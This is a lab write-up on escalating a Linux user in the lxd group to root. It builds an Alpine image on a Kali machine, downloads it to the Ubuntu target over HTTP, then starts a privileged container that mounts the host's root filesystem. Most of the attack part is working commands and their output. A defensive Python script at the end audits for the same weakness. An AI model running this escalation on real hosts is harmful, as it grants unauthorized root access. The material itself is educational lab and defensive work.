[Intranet Attack and Defense] Linux Privilege Escalation via LXD

Ubuntu

As root, install lxd, lxc, lxc-templates and zfsutils-linux

cps@ubuntu:~$ sudo su root
root@ubuntu:/home/cps# apt install lxd lxc lxc-templates
E: Could not get lock /var/lib/dpkg/lock-frontend - open (11: Resource temporarily unavailable)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), is another process using it?
root@ubuntu:/home/cps# cd Desktop/
root@ubuntu:/home/cps/Desktop# ll
total 12
drwxr-xr-x  2 cps cps 4096 55 12:59 ./
drwxr-xr-x 15 cps cps 4096 55 12:57 ../
-rw-------  1 cps cps  150 54 18:22 lock.sh
root@ubuntu:/home/cps/Desktop# chmod 777 lock.sh 
root@ubuntu:/home/cps/Desktop# ./lock.sh 
Hit:1 http://security.ubuntu.com/ubuntu bionic-security InRelease              
Hit:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease              
Hit:3 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease
Hit:4 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease
Reading package lists... Done                     
Building dependency tree       
Reading state information... Done
319 packages can be upgraded. Run 'apt list --upgradable' to see them.


root@ubuntu:/home/cps/Desktop# apt install lxd lxc lxc-templates
root@ubuntu:/home/cps/Desktop# apt install zfsutils-linux

Create an ordinary account aaa and add it to the lxd group

root@ubuntu:/home/cps# useradd aaa
root@ubuntu:/home/cps# passwd aaa
Enter new UNIX password: 111111
Retype new UNIX password: 111111
passwd: password updated successfully

root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)
root@ubuntu:/home/cps# cat /etc/group | grep aaa
aaa:x:1001:

root@ubuntu:/home/cps# usermod -G lxd aaa
root@ubuntu:/home/cps# cat /etc/group | grep aaa
lxd:x:127:cps,aaa
aaa:x:1001:
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa),127(lxd)
root@ubuntu:/home/cps# 

Initialize LXD

root@ubuntu:/home/cps# lxd init

At the prompt whose default is [default=zfs], choose dir instead; press Enter to accept the default for everything else.

Launch a container with lxc

If there is no ubuntu image locally, it is downloaded automatically, which takes quite a while.

root@ubuntu:/home/cps# lxc launch ubuntu
To start your first container, try: lxc launch ubuntu:18.04

Creating the container
The local image 'ubuntu' couldn't be found, trying 'ubuntu:' instead.
Retrieving image: rootfs: 2% (101.99kB/s)   

List the containers

root@ubuntu:/home/cps# lxc launch ubuntu
Creating the container
The local image 'ubuntu' couldn't be found, trying 'ubuntu:' instead.
Container name is: fun-mustang
Starting fun-mustang
root@ubuntu:/home/cps# lxc list


Kali

Download the Alpine builder and build the image

┌──(root㉿kali)-[~]
└─# ping www.baidu.com
PING www.a.shifen.com (183.2.172.42) 56(84) bytes of data.
64 bytes from 183.2.172.42 (183.2.172.42): icmp_seq=1 ttl=128 time=39.3 ms
64 bytes from 183.2.172.42 (183.2.172.42): icmp_seq=2 ttl=128 time=49.5 ms
^Z
zsh: suspended  ping www.baidu.com
                                                                             
┌──(root㉿kali)-[~]
└─# git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 90.00 KiB/s, done.
Resolving deltas: 100% (15/15), done.
                                                                             
┌──(root㉿kali)-[~]
└─# cd lxd-alpine-builder 
                                                                                                                                         
┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# ./build-alpine


Start an HTTP server

Move the file alpine-v3.13-x86_64-20210218_0139.tar.gz to the desktop (/Desktop) and start the HTTP server from the /Desktop directory.


┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# cd ..                
                                                                                        
┌──(root㉿kali)-[~]
└─# cd Desktop 
                                                                                        
┌──(root㉿kali)-[~/Desktop]
└─# python -m SimpleHTTPServer                                
/usr/bin/python: No module named SimpleHTTPServer
                                                                                    

┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...


IP information

┌──(root㉿kali)-[~]
└─# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host proto kernel_lo 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:fa:4e:d4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.196.3/24 brd 192.168.196.255 scope global dynamic noprefixroute eth0
       valid_lft 942sec preferred_lft 942sec
    inet6 fe80::20c:29ff:fefa:4ed4/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
                                                                             
┌──(root㉿kali)-[~]
└─# 

Ubuntu

Error!! aaa cannot log in to the graphical desktop.

Delete aaa, recreate the user, and add it to the group again

cps@ubuntu:~$ sudo su root
[sudo] password for cps: 
root@ubuntu:/home/cps# userdel aaa
root@ubuntu:/home/cps# adduser aaa
Adding user `aaa' ...
Adding new group `aaa' (1001) ...
Adding new user `aaa' (1001) with group `aaa' ...
Creating home directory `/home/aaa' ...
Copying files from `/etc/skel' ...
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
Changing the user information for aaa
Enter the new value, or press ENTER for the default
	Full Name []: 
	Room Number []: 
	Work Phone []: 
	Home Phone []: 
	Other []: 
Is the information correct? [Y/n] 
root@ubuntu:/home/cps# 
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)
root@ubuntu:/home/cps# usermod -G lxd aaa
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa),127(lxd)
root@ubuntu:/home/cps# su aaa
aaa@ubuntu:/home/cps$ 

As aaa, switch to the /tmp directory and download the tar.gz package

aaa@ubuntu:/tmp$  wget 192.168.196.3:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz


Import the image into LXD and list it

aaa@ubuntu:/tmp$ ll alpine-v3.13-x86_64-20210218_0139.tar.gz 
-rw-rw-r-- 1 aaa aaa 3259593 55 15:39 alpine-v3.13-x86_64-20210218_0139.tar.gz
aaa@ubuntu:/tmp$ lxc image import /tmp/alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
aaa@ubuntu:/tmp$ lxc image list


Privilege escalation as the ordinary user aaa

root creates a file

root@ubuntu:~/snap# cd /root/
root@ubuntu:~# touch testaaa.txt
root@ubuntu:~# vi testaaa.txt 
root@ubuntu:~# cat testaaa.txt 
root can see
root@ubuntu:~# ls
snap  testaaa.txt
root@ubuntu:~# 

aaa has no access

aaa@ubuntu:~$ cd /root/
bash: cd: /root/: Permission denied
aaa@ubuntu:~$ 

Escalate privileges with lxc

aaa@ubuntu:~$ lxc init myimage aaa -c security.privileged=true
Creating aaa
aaa@ubuntu:~$ lxc config device add aaa mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to aaa
aaa@ubuntu:~$ lxc start aaa


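  • lxc init initializes myimage, i.e. the Alpine system, and creates the aaa account; the -c option sets the security privilege policy to true, meaning aaa can request elevated privileges
  • lxc config device configures devices: add attaches the device mydevice to the aaa account; disk is a disk mount that mounts the host's / directory under /mnt in the container; recursive controls recursion, i.e. whether all subdirectories and files are mounted as well
  • lxc start starts the user that was just added
  • lxc exec executes a command: run sh as aaa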

Privilege escalation test

aaa@ubuntu:~$  lxc exec aaa /bin/sh
~ # id 
uid=0(root) gid=0(root)
~ # whoami
root
~ # pwd
/root
~ # cd /mnt/
/mnt #  cd root/
/mnt/root # pwd
/mnt/root
/mnt/root # cd ./root/
/mnt/root/root # ls
snap         testaaa.txt
/mnt/root/root # cat testaaa.txt 
root can see
/mnt/root/root 
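
An added defensive example (not part of the original post) that audits a host for the condition this walkthrough relies on: it lists the members of the lxd group and flags instances that combine security.privileged=true with a disk device sourced from a host path. It reads the expanded_config and expanded_devices fields of `lxc list --format json`; the sample group file and instance JSON below are constructed to mirror this lab.

```python
import json

# Constructed sample input that mirrors this lab; not captured from a real host.
SAMPLE_GROUP = "root:x:0:\nlxd:x:127:cps,aaa\naaa:x:1001:\n"
SAMPLE_INSTANCES = json.dumps([
    {"name": "aaa",
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {"mydevice": {"type": "disk", "source": "/",
                                       "path": "/mnt/root", "recursive": "true"}}},
    {"name": "fun-mustang",
     "expanded_config": {},
     "expanded_devices": {"root": {"type": "disk", "pool": "default", "path": "/"}}},
])

TRUE_VALUES = {"true", "1", "yes", "on"}  # boolean spellings LXD accepts


def lxd_group_members(group_text, group="lxd"):
    """Accounts in `group` per /etc/group text; each can drive the LXD daemon."""
    for line in group_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 4 and fields[0] == group:
            return [m for m in fields[3].split(",") if m]
    return []


def risky_instances(instances_json):
    """Return (name, privileged, host_paths, severity) for instances worth review."""
    findings = []
    for inst in json.loads(instances_json):
        cfg = inst.get("expanded_config") or inst.get("config") or {}
        devs = inst.get("expanded_devices") or inst.get("devices") or {}
        privileged = str(cfg.get("security.privileged", "")).lower() in TRUE_VALUES
        # A disk device whose source is an absolute path passes a host directory
        # into the container; the instance's own root disk has a pool, no source.
        host_paths = sorted(str(d["source"]) for d in devs.values()
                            if d.get("type") == "disk"
                            and str(d.get("source", "")).startswith("/"))
        if privileged or host_paths:
            critical = privileged and "/" in host_paths
            findings.append((inst["name"], privileged, host_paths,
                             "critical" if critical else "review"))
    return findings


if __name__ == "__main__":
    print("lxd group members:", lxd_group_members(SAMPLE_GROUP))
    for finding in risky_instances(SAMPLE_INSTANCES):
        print(finding)
```

On a live host, pass it the contents of /etc/group and the output of `lxc list --format json`; an account whose primary group is lxd appears only in /etc/passwd and needs a separate check.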


Appendix: references
